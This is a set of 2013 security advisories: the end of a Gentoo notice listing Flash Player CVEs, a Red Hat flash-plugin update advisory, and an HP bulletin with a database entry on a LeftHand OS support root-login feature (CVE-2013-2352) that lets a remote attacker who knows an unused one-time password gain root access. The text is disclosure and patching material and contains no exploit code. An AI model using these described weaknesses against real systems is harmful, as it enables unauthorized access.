http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5277 [ 55 ] CVE-2012-5278 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5278 [ 56 ] CVE-2012-5279 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5279 [ 57 ] CVE-2012-5280 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5280 [ 58 ] CVE-2012-5676 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5676 [ 59 ] CVE-2012-5677 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5677 [ 60 ] CVE-2012-5678 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5678 [ 61 ] CVE-2013-0504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0504 [ 62 ] CVE-2013-0630 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0630 [ 63 ] CVE-2013-0633 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0633 [ 64 ] CVE-2013-0634 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0634 [ 65 ] CVE-2013-0637 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0637 [ 66 ] CVE-2013-0638 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0638 [ 67 ] CVE-2013-0639 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0639 [ 68 ] CVE-2013-0642 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0642 [ 69 ] CVE-2013-0643 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0643 [ 70 ] CVE-2013-0644 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0644 [ 71 ] CVE-2013-0645 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0645 [ 72 ] CVE-2013-0646 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0646 [ 73 ] CVE-2013-0647 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0647 [ 74 ] CVE-2013-0648 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0648 [ 75 ] CVE-2013-0649 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0649 [ 76 ] CVE-2013-0650 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0650 [ 77 ] CVE-2013-1365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1365 [ 78 ] CVE-2013-1366 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1366 [ 79 ] CVE-2013-1367 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1367 [ 80 ] CVE-2013-1368 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1368 [ 81 ] CVE-2013-1369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1369 [ 82 ] CVE-2013-1370 
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1370 [ 83 ] CVE-2013-1371 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1371 [ 84 ] CVE-2013-1372 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1372 [ 85 ] CVE-2013-1373 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1373 [ 86 ] CVE-2013-1374 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1374 [ 87 ] CVE-2013-1375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1375 [ 88 ] CVE-2013-1378 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1378 [ 89 ] CVE-2013-1379 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1379 [ 90 ] CVE-2013-1380 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1380 [ 91 ] CVE-2013-2555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2555 [ 92 ] CVE-2013-2728 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2728 [ 93 ] CVE-2013-3343 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3343 [ 94 ] CVE-2013-3344 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3344 [ 95 ] CVE-2013-3345 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3345 [ 96 ] CVE-2013-3347 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3347 [ 97 ] CVE-2013-3361 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3361 [ 98 ] CVE-2013-3362 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3362 [ 99 ] CVE-2013-3363 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3363 [ 100 ] CVE-2013-5324 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5324 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201309-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. 
http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2013:1035-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-1035.html Issue date: 2013-07-10 CVE Names: CVE-2013-3344 CVE-2013-3345 CVE-2013-3347 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes three security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed in the Adobe Security bulletin APSB13-17, listed in the References section. Specially-crafted SWF content could cause flash-plugin to crash or, potentially, execute arbitrary code when a victim loads a page containing the malicious SWF content. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. 
Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258 5. Bugs fixed (http://bugzilla.redhat.com/): 982749 - CVE-2013-3344 CVE-2013-3345 CVE-2013-3347 flash-plugin: Multiple code execution flaws (APSB13-17) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.297-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.297-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.297-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.297-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2013-3344.html https://www.redhat.com/security/data/cve/CVE-2013-3345.html https://www.redhat.com/security/data/cve/CVE-2013-3347.html https://access.redhat.com/security/updates/classification/#critical http://www.adobe.com/support/security/bulletins/apsb13-17.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2013 Red Hat, Inc. 
VAR-201307-0043 CVE-2013-2352 HP StoreVirtual Storage Runs on the device LeftHand OS Vulnerabilities that gain management access CVSS V2: 9.4
CVSS V3: -
Severity: HIGH
LeftHand OS (aka SAN iQ) 10.5 and earlier on HP StoreVirtual Storage devices does not provide a mechanism for disabling the HP Support challenge-response root-login feature, which makes it easier for remote attackers to obtain administrative access by leveraging knowledge of an unused one-time password. HP StoreVirtual products using LeftHand OS are prone to an unauthorized-access vulnerability. A remote attacker can exploit this issue to gain unauthorized access to the affected device. This may aid in further attacks. HP StoreVirtual Storage is a set of virtual storage devices supported by LeftHand OS of Hewlett-Packard (HP), which provides functions such as updating data centers, reducing SAN costs and eliminating failure points. LeftHand OS (aka SAN iQ) is an operating system used on this device. A remote attacker who knows an unused one-time password can use it to gain root access. Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03825537 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03825537 Version: 2 HPSBST02896 rev.2 - HP StoreVirtual Storage, Remote Unauthorized Access NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-07-17 Last Updated: 2013-07-17 Potential Security Impact: Remote unauthorized access Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with the HP StoreVirtual Storage. All HP StoreVirtual Storage systems are equipped with a mechanism that allows HP support to access the underlying operating system if permission and access is provided by the customer. This functionality cannot be disabled today.
HP StoreVirtual products are storage appliances that use a custom operating system, LeftHand OS, which is not accessible to the end user. Limited access is available to the user via the HP StoreVirtual Command-Line Interface (CLiQ); however, root access is blocked. Root access may be requested by HP Support in some cases to help customers resolve complex support issues. To facilitate these cases, a challenge-response-based one-time password utility is employed by HP Support to gain root access to systems when the customer has granted permission and network access to the system. The one-time password utility protects the root access by preventing repeated access to the system with the same pass phrase. Root access to the LeftHand OS does not provide access to the user data being stored on the system. References: CVE-2013-2352 (SSRT101257) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. This issue affects LeftHand OS (a.k.a. SAN iQ) software versions 10.5 and earlier. HP StoreVirtual device: HP P4300, HP P4500, HP P4300 G2, HP P4500 G2, HP P4800 G2, HP P4900 G2, HP P4000 VSA, HP StoreVirtual 4130, HP StoreVirtual 4330, HP StoreVirtual 4530, HP StoreVirtual 4630, HP StoreVirtual 4730, HP StoreVirtual VSA, LeftHand NSM2060, LeftHand NSM2120, Dell PowerEdge 2950, HP DL320S, IBM System x3650, LeftHand NSM2060 G2, LeftHand NSM2120 G2, LeftHand VSA. BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2013-2352 (AV:N/AC:L/Au:N/C:N/I:C/A:C) 9.4 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks Joshua Small for reporting this issue to security-alert@hp.com RESOLUTION HP has provided patches to resolve this vulnerability. Please see the table below to determine which patch applies to the StoreVirtual version being used.
Installation of patch 25051-00 will fail if 9.5 Patch Set 05 is not present.

Note: HP Support may still request root access to customer systems in order to resolve certain support issues.

Patches and release notes may be downloaded using the 9.5 or later CMC.

Go to http://www.hp.com/go/hpsc
Select your specific product. If you have a HP P4x00 G2 or HP StoreVirtual 4000 product select 'HP StoreVirtual 4000 Storage'.
Select 'Drivers, Software & Firmware' under 'Download Options' in the left menu.
Select your specific product.
Select your language.
Click 'Cross operating system (BIOS, Firmware, Diagnostics, etc.)'
Click 'Patch' or scroll down to the Patch table.
In the Description column of the Patch table, click the title of the patch:
To download the file, click the 'Download' button.
To read the release notes, click the 'Release Notes' tab.

HISTORY
Version:1 (rev.1) - 9 July 2013 Initial release
Version:2 (rev.2) - 17 July 2013 Documented the released patches, added LeftHand NSM2120

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.